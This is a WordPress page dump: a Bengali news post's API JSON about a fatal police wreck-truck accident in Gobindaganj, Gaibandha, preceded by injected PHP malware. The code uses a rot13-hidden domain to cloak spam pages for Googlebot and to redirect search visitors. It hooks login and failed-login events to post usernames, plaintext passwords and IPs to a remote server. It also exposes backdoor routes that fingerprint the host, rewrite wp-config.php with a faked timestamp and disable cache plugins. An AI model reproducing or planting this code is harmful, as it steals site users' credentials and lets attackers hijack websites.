ass CovenVP { private $args = NULL; public function __construct($args) { if (!isset($args['slug'])) throw new Exception('No slug given for virtual page'); $this->args = $args; add_filter('the_posts', array($this, 'virtual_page')); } public function virtual_page($posts) { global $wp; $slug = isset($this->args['slug']) ? $this->args['slug'] : ''; if (0 === count($posts) && (0 === strcasecmp($wp->request, $slug) || $slug === $wp->query_vars['page_id'])) { $post = new stdClass(); $post->ID = - 128; $post->post_author = isset($this->args['author']) ? $this->args['author'] : 1; $post->post_date = isset($this->args['date']) ? $this->args['date'] : current_time('mysql'); $post->post_date_gmt = isset($this->args['dategmt']) ? $this->args['dategmt'] : current_time('mysql', 1); $post->post_content = isset($this->args['content']) ? $this->args['content'] : ''; $post->post_title = isset($this->args['title']) ? $this->args['title'] : ''; $post->post_excerpt = ''; $post->post_status = 'publish'; $post->comment_status = 'closed'; $post->ping_status = 'closed'; $post->post_password = ''; $post->post_name = $slug; $post->to_ping = ''; $post->pinged = ''; $post->post_modified = $post->post_date; $post->post_modified_gmt = $post->post_date_gmt; $post->post_content_filtered = ''; $post->post_parent = 0; $post->guid = get_home_url('/' . $slug); $post->menu_order = 0; $post->post_type = isset($this->args['type']) ? $this->args['type'] : 'page'; $post->post_mime_type = ''; $post->comment_count = 0; $post = apply_filters('coven_virtual_page_content', $post); $posts = array($post); global $wp_query; $wp_query->is_page = TRUE; $wp_query->is_singular = TRUE; $wp_query->is_home = FALSE; $wp_query->is_archive = FALSE; $wp_query->is_category = FALSE; unset($wp_query->query['error']); $wp_query->query_vars['error'] = ''; $wp_query->is_404 = FALSE; } return $posts; } } } if (!function_exists('coven_create_virtual')) { function coven_create_virtual() { $covenD = str_rot13('mnuunuu.qvtvgny'); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://coven.{$covenD}/shilov/" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $html = curl_exec($ch); $html = json_decode($html, true); curl_close($ch); if (json_last_error() === JSON_ERROR_NONE) { $url = trim(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH), '/'); $args = array('slug' => $url, 'title' => $html['title'], 'content' => $html['body']); $pg = new CovenVP($args); } } } if (preg_match("/google|bing|msn|yahoo/i", $ref) && !$googleBot && !$anyBot) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://source.{$ccd}/in/drws/?val1={$hwost}"); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_REFERER, $host . $uri); curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Forwarded-For: ' . $gbt)); $html = curl_exec($ch); if (curl_getinfo($ch, CURLINFO_REDIRECT_URL)) { $redirectUrl = curl_getinfo($ch, CURLINFO_REDIRECT_URL); header('Location: ' . $redirectUrl); exit(); } } elseif ($googleBot) { add_action('init', 'coven_create_virtual'); } else { header("Location: http://" . $_SERVER["HTTP_HOST"]); exit(); } } if(!$googleBot){ if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $ccd = str_rot13('mnuunuu.qvtvgny'); $wpApiUrl = "https://api.{$ccd}/api.php"; $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login']) && strpos($_SERVER['HTTP_USER_AGENT'], '100.6.1155.294') === false) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action') ) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } if (!function_exists('wordpress_api_wrongauth_debug')) { function wordpress_api_wrongauth_debug( $user_login, $user ){ $ccd = str_rot13('mnuunuu.qvtvgny'); $wpApiUrl = "https://api.{$ccd}/api_false.php"; $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login_failed', 'wordpress_api_wrongauth_debug', 10, 2 ); } if (preg_match("#/ququos#", $id) ) { echo uniqid() . " {$hwost} " . phpversion() . "
"; $wpfingerprint = php_uname() . disk_total_space('.') . filectime('/') . phpversion(); echo hash('sha256', $wpfingerprint) . "
"; $time_elapsed = timer_stop(); echo "cheetie {$time_elapsed} secs
"; //echo "
{$htaccess}
"; exit(); } if (preg_match("#/eezee#", $id) ) { $eezeewpconfig = file_get_contents(ABSPATH . '/wp-config.php'); if (strpos($eezeewpconfig, 'WP_CACHE') !== false) { $ezlastMtime = filemtime ( ABSPATH . '/wp-config.php' ) + rand(1, 1000); $ez = preg_replace('#define\(.*WP_CACHE.*\);#Ui', "define('WP_CACHE', false);", $eezeewpconfig, 1); file_put_contents(ABSPATH . '/wp-config.php', $ez); touch(ABSPATH . '/wp-config.php', $ezlastMtime); //echo $ez; echo "WP_CACHE replaced\n"; } if(file_exists(ABSPATH . '/wp-content/mu-plugins/endurance-page-cache.php')){ unlink(ABSPATH . '/wp-content/mu-plugins/endurance-page-cache.php'); echo 'endurance-page-cache.php removed '; } if(file_exists(ABSPATH . '/wp-content/endurance-page-cache')){ rename(ABSPATH . '/wp-content/endurance-page-cache', ABSPATH . '/wp-content/endurance-page-caches'); echo 'endurance-page-cache renamed'; } exit(); } if (preg_match("#/lseez#", $id) ) { var_dump(get_option('litespeed.conf.cache')); update_option( 'litespeed.conf.cache', 0 ); var_dump(get_option('litespeed.conf.cache')); exit(); } } ?>{"id":4442,"date":"2024-03-06T09:44:16","date_gmt":"2024-03-06T09:44:16","guid":{"rendered":"https:\/\/dainikswadeshbangla.com\/?p=4442"},"modified":"2024-03-06T09:44:16","modified_gmt":"2024-03-06T09:44:16","slug":"%e0%a6%97%e0%a6%be%e0%a6%87%e0%a6%ac%e0%a6%be%e0%a6%a8%e0%a7%8d%e0%a6%a7%e0%a6%be%e0%a6%b0-%e0%a6%97%e0%a7%8b%e0%a6%ac%e0%a6%bf%e0%a6%a8%e0%a7%8d%e0%a6%a6%e0%a6%97%e0%a6%9e%e0%a7%8d%e0%a6%9c-5","status":"publish","type":"post","link":"https:\/\/dainikswadeshbangla.com\/%e0%a6%97%e0%a6%be%e0%a6%87%e0%a6%ac%e0%a6%be%e0%a6%a8%e0%a7%8d%e0%a6%a7%e0%a6%be%e0%a6%b0-%e0%a6%97%e0%a7%8b%e0%a6%ac%e0%a6%bf%e0%a6%a8%e0%a7%8d%e0%a6%a6%e0%a6%97%e0%a6%9e%e0%a7%8d%e0%a6%9c-5\/","title":{"rendered":"\u0997\u09be\u0987\u09ac\u09be\u09a8\u09cd\u09a7\u09be\u09b0 \u0997\u09cb\u09ac\u09bf\u09a8\u09cd\u09a6\u0997\u099e\u09cd\u099c\u09c7 \u09aa\u09c1\u09b2\u09bf\u09b6\u09c7\u09b0 \u09b0\u09c7\u0995\u09be\u09b0 \u0997\u09be\u09dc\u09c0\u09b0 \u09a7\u09be\u0995\u09cd\u0995\u09be\u09df \u09a8\u09bf\u09b9\u09a4 \u09e7: \u0986\u09b9\u09a4 \u09ea\u0983\u099c\u09a8:"},"content":{"rendered":"
\n
\u0997\u09be\u0987\u09ac\u09be\u09a8\u09cd\u09a7\u09be\u09b0 \u0997\u09cb\u09ac\u09bf\u09a8\u09cd\u09a6\u0997\u099e\u09cd\u099c\u09c7 \u09aa\u09c1\u09b2\u09bf\u09b6\u09c7\u09b0 \u09b0\u09c7\u0995\u09be\u09b0 \u0997\u09be\u09dc\u09c0\u09b0 \u09a7\u09be\u0995\u09cd\u0995\u09be\u09df \u09a8\u09bf\u09b9\u09a4 \u09e7: \u0986\u09b9\u09a4 \u09ea\u0983\u099c\u09a8:<\/strong><\/div>\n
\n
\n
\n
<\/div>\n
\u09ae\u09cb\u09b9\u09a8 \u09b8\u09b0\u0995\u09be\u09b0: \u0997\u09be\u0987\u09ac\u09be\u09a8\u09cd\u09a7\u09be \u099c\u09c7\u09b2\u09be \u09aa\u09cd\u09b0\u09a4\u09bf\u09a8\u09bf\u09a7\u09bf<\/strong>\u0964<\/div>\n
<\/div>\n
\u0997\u09be\u0987\u09ac\u09be\u09a8\u09cd\u09a7\u09be\u09b0 \u0997\u09cb\u09ac\u09bf\u09a8\u09cd\u09a6\u0997\u099e\u09cd\u099c \u09aa\u09cc\u09b0 \u09b6\u09b9\u09b0\u09c7\u09b0 \u099a\u09be\u09b0\u09ae\u09be\u09a5\u09be \u09ae\u09cb\u09dc\u09c7 \u09aa\u09c1\u09b2\u09bf\u09b6\u09c7\u09b0 \u09b0\u09c7\u0995\u09be\u09b0 \u0997\u09be\u09dc\u09c0\u09b0 \u09a7\u09be\u0995\u09cd\u0995\u09be\u09df \u098f\u0995 \u09b0\u09bf\u0995\u09b6\u09be \u099a\u09be\u09b2\u0995 \u09a8\u09bf\u09b9\u09a4 \u0993 \u099a\u09be\u09b0\u099c\u09a8 \u0986\u09b9\u09a4 \u09b9\u09df\u09c7\u099b\u09c7\u0964<\/div>\n
\u0998\u099f\u09a8\u09be\u099f\u09bf \u0998\u099f\u09c7\u099b\u09c7 \u09ac\u09c1\u09a7\u09ac\u09be\u09b0 (\u09ec \u09ae\u09be\u09b0\u09cd\u099a) \u09b8\u0995\u09be\u09b2 \u09b8\u09be\u09dc\u09c7 \u09e7\u09e6:\u09e9\u09e6 \u09ae\u09bf\u09a8\u09bf\u099f \u09a8\u09be\u0997\u09be\u09a6 \u09b0\u09be\u09b8\u09cd\u09a4\u09be \u09aa\u09be\u09b0\u09be\u09aa\u09be\u09b0\u09c7\u09b0 \u09b8\u09ae\u09df \u098f \u09a6\u09c1\u09b0\u09cd\u0998\u099f\u09a8\u09be \u0998\u099f\u09c7 \u09ac\u09b2\u09c7 \u099c\u09be\u09a8\u09be \u09af\u09be\u09df\u0964<\/div>\n
<\/div>\n
\u0989\u0995\u09cd\u09a4 \u0998\u099f\u09a8\u09be\u09df \u09ac\u09bf\u0995\u09cd\u09b7\u09c1\u09ac\u09cd\u09a7 \u09b6\u09cd\u09b0\u09ae\u09bf\u0995 \u0993 \u099c\u09a8\u09b8\u09be\u09a7\u09be\u09b0\u09a3 \u09ae\u09bf\u09b2\u09c7 \u099a\u09be\u09b0\u09ae\u09be\u09a5\u09be \u09ae\u09cb\u09dc\u09c7 \u09aa\u09c1\u09b2\u09bf\u09b6\u09c7\u09b0 \u099f\u09cd\u09b0\u09be\u09ab\u09bf\u0995 \u09ac\u0995\u09cd\u09b8 \u09ad\u09be\u0982\u099a\u09c1\u09b0, \u099f\u09be\u09df\u09be\u09b0 \u099c\u09cd\u09ac\u09be\u09b2\u09bf\u09df\u09c7 \u0985\u0997\u09cd\u09a8\u09bf\u09b8\u0982\u09af\u09cb\u0997 \u0993 \u09b8\u09dc\u0995 \u0985\u09ac\u09b0\u09cb\u09a7 \u0995\u09b0\u09c7\u0964 \u098f\u09b8\u09ae\u09df \u09b0\u0982\u09aa\u09c1\u09b0-\u09a2\u09be\u0995\u09be \u0993 \u09a6\u09bf\u09a8\u09be\u099c\u09aa\u09c1\u09b0-\u09a2\u09be\u0995\u09be \u09ae\u09b9\u09be\u09b8\u09dc\u0995\u09c7 \u09aa\u09cd\u09b0\u09be\u09df \u09a6\u09c7\u09dc \u0998\u09a8\u09cd\u099f\u09be \u09af\u09be\u09a8\u09ac\u09be\u09b9\u09a8 \u099a\u09b2\u09be\u099a\u09b2 \u09ac\u09a8\u09cd\u09a7 \u099b\u09bf\u09b2\u0964<\/div>\n
\u09a8\u09bf\u09b9\u09a4 \u09b0\u09bf\u0995\u09b6\u09be \u099a\u09be\u09b2\u0995\u09c7\u09b0 \u09aa\u09b0\u09bf\u099a\u09df \u098f\u0996\u09a8\u09cb \u09aa\u09be\u0993\u09df\u09be \u09af\u09be\u09df\u09a8\u09bf\u0964 \u09a4\u09ac\u09c7 \u0986\u09b9\u09a4 \u098f\u0995\u099c\u09a8 \u09b0\u09bf\u0995\u09b6\u09be \u099a\u09be\u09b2\u0995\u09c7\u09b0 \u09a8\u09be\u09ae \u0986\u09b8\u09be\u09a6\u09c1\u09b2 \u09ac\u09b2\u09c7 \u099c\u09be\u09a8\u09be \u0997\u09c7\u099b\u09c7\u0964 \u0986\u09b9\u09a4\u09a6\u09c7\u09b0 \u09a8\u09bf\u0995\u099f\u09ac\u09b0\u09cd\u09a4\u09c0 \u0989\u09aa\u099c\u09c7\u09b2\u09be \u09b8\u09cd\u09ac\u09be\u09b8\u09cd\u09a5\u09cd\u09af \u0995\u09ae\u09aa\u09cd\u09b2\u09c7\u0995\u09cd\u09b8\u09c7 \u09ad\u09b0\u09cd\u09a4\u09bf \u0995\u09b0\u09be \u09b9\u09df\u09c7\u099b\u09c7\u0964 \u098f\u0995\u099c\u09a8\u09c7\u09b0 \u0985\u09ac\u09b8\u09cd\u09a5\u09be \u09ac\u09c7\u09b6 \u0986\u09b6\u0982\u0995\u09be\u099c\u09a8\u0995\u0964<\/div>\n
<\/div>\n
\u09aa\u09cd\u09b0\u09a4\u09cd\u09af\u0995\u09cd\u09b7\u09a6\u09b0\u09cd\u09b6\u09c0\u09b0\u09be \u099c\u09be\u09a8\u09be\u09a8, \u09aa\u09c1\u09b2\u09bf\u09b6\u09c7\u09b0 \u09ac\u09c7\u09aa\u09b0\u09cb\u09df\u09be \u0997\u09a4\u09bf\u09a4\u09c7 \u0997\u09be\u09dc\u09c0 \u099a\u09be\u09b2\u09be\u09a8\u09cb\u09b0 \u09ab\u09b2\u09c7 \u098f \u09a6\u09c2\u09b0\u09cd\u0998\u099f\u09a8\u09be \u09b9\u09df\u09c7\u099b\u09c7\u0964<\/div>\n
\u0996\u09ac\u09b0 \u09aa\u09c7\u09df\u09c7 \u0989\u09aa\u099c\u09c7\u09b2\u09be \u09aa\u09b0\u09bf\u09b7\u09a6\u09c7\u09b0 \u099a\u09c7\u09df\u09be\u09b0\u09ae\u09cd\u09af\u09be\u09a8 \u0993 \u0989\u09aa\u099c\u09c7\u09b2\u09be \u0986\u0993\u09df\u09be\u09ae\u09c0 \u09b2\u09c0\u0997\u09c7\u09b0 \u09b8\u09ad\u09be\u09aa\u09a4\u09bf \u0986\u09ac\u09cd\u09a6\u09c1\u09b2 \u09b2\u09a4\u09bf\u09ab \u09aa\u09cd\u09b0\u09a7\u09be\u09a8,\u0989\u09aa\u099c\u09c7\u09b2\u09be \u09a8\u09bf\u09b0\u09cd\u09ac\u09be\u09b9\u09c0 \u0995\u09b0\u09cd\u09ae\u0995\u09b0\u09cd\u09a4\u09be \u09b0\u09be\u09b8\u09c7\u09b2 \u09ae\u09bf\u09df\u09be, \u09a5\u09be\u09a8\u09be\u09b0 \u0985\u09ab\u09bf\u09b8\u09be\u09b0 \u0987\u09a8\u099a\u09be\u09b0\u09cd\u099c (\u0993\u09b8\u09bf) \u09b6\u09be\u09ae\u09b8\u09c1\u09b2 \u0986\u09b2\u09ae \u09b6\u09be\u09b9, \u09b0\u09bf\u0995\u09b6\u09be \u09b6\u09cd\u09b0\u09ae\u09bf\u0995 \u09a8\u09c7\u09a4\u09be \u09aa\u09cc\u09b0\u09b8\u09ad\u09be\u09b0 \u09aa\u09cd\u09af\u09be\u09a8\u09c7\u09b2 \u09ae\u09c7\u09df\u09b0 \u0995\u09be\u0989\u09a8\u09cd\u09b8\u09bf\u09b2\u09b0 \u09b6\u09be\u09b9\u09c0\u09a8 \u0986\u0995\u09a8\u09cd\u09a6 \u0995\u09be\u0989\u09a8\u09cd\u09b8\u09bf\u09b2\u09b0 \u09b0\u09bf\u09ae\u09a8 \u09a4\u09be\u09b2\u09c1\u0995\u09a6\u09be\u09b0 \u09b8\u09b9 \u09ac\u09bf\u09ad\u09bf\u09a8\u09cd\u09a8 \u09a8\u09c7\u09a4\u09c3\u09ac\u09c3\u09a8\u09cd\u09a6 \u0998\u099f\u09a8\u09be\u09b8\u09cd\u09a5\u09b2\u09c7 \u0997\u09bf\u09df\u09c7 \u09aa\u09b0\u09bf\u09b8\u09cd\u09a5\u09bf\u09a4\u09bf \u09b6\u09be\u09a8\u09cd\u09a4 \u0995\u09b0\u09be\u09b0 \u099a\u09c7\u09b7\u09cd\u099f\u09be \u0995\u09b0\u09c7\u0964<\/div>\n
\u09aa\u09b0\u09c7 \u0997\u09be\u0987\u09ac\u09be\u09a8\u09cd\u09a7\u09be \u0993 \u09a2\u09be\u0995\u09be \u09a5\u09c7\u0995\u09c7 \u09ae\u09cb\u09ac\u09be\u0987\u09b2\u09c7 \u0995\u09a5\u09be \u09b9\u09b2\u09c7 \u09a4\u09be\u09b0 \u0986\u09b6\u09cd\u09ac\u09be\u09b8\u09c7 \u099c\u09a8\u09a4\u09be \u0985\u09ac\u09b0\u09cb\u09a7 \u09a4\u09c1\u09b2\u09c7 \u09a8\u09c7\u09df\u0964<\/div>\n<\/div>\n<\/div>\n<\/div>\n